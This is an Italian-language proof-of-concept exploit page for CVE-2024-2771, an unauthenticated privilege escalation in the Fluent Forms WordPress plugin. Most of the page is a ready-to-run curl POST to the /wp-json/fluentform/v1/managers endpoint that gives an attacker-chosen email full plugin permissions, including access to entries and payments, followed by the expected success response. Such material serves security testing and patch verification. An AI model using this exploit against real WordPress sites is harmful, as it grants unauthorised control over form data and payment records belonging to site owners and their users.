
Exploit proof-of-concept per CVE-2024-2771, una vulnerabilità di escalation dei privilegi nel plugin Fluent Forms per WordPress tramite un endpoint REST API non autenticato.
CVE-2024-2771 Prova di concetto
Il plugin Contact Form di Fluent Forms per Quiz, Sondaggi e Drag & Drop WP Form Builder per WordPress è vulnerabile all'escalation dei privilegi a causa della mancanza di un controllo delle capacità sull'endpoint REST API /wp-json/fluentform/v1/managers in tutte le versioni fino alla 5.1.16 inclusa. Ciò consente ad attaccanti non autenticati di concedere agli utenti permessi di gestione di Fluent Form, dando loro accesso a tutte le impostazioni e funzionalità del plugin. Ciò consente inoltre ad attaccanti non autenticati di eliminare account manager.
Prerequisiti
Comando di exploit
# 1. Grant full Fluent Forms permissions to an arbitrary email
curl -i -X POST "http://TARGET/wp-json/fluentform/v1/managers" \
-H "Content-Type: application/json" \
-d '{
"manager": {
"email": "[email protected]",
"permissions": [
"fluentform_dashboard_access",
"fluentform_forms_manager",
"fluentform_entries_viewer",
"fluentform_manage_entries",
"fluentform_view_payments",
"fluentform_manage_payments",
"fluentform_settings_manager",
"fluentform_full_access"
]
}
}'
Risposta attesa
HTTP/1.1 200 OK
{
"message": "Manager has been saved.",
"manager": {
"id": 2,
"email": "[email protected]",
"permissions": [
"fluentform_dashboard_access",
"fluentform_forms_manager",
"fluentform_entries_viewer",
"fluentform_manage_entries",
"fluentform_view_payments",
"fluentform_manage_payments",
"fluentform_settings_manager",
"fluentform_full_access"
]
}
}
Schermata
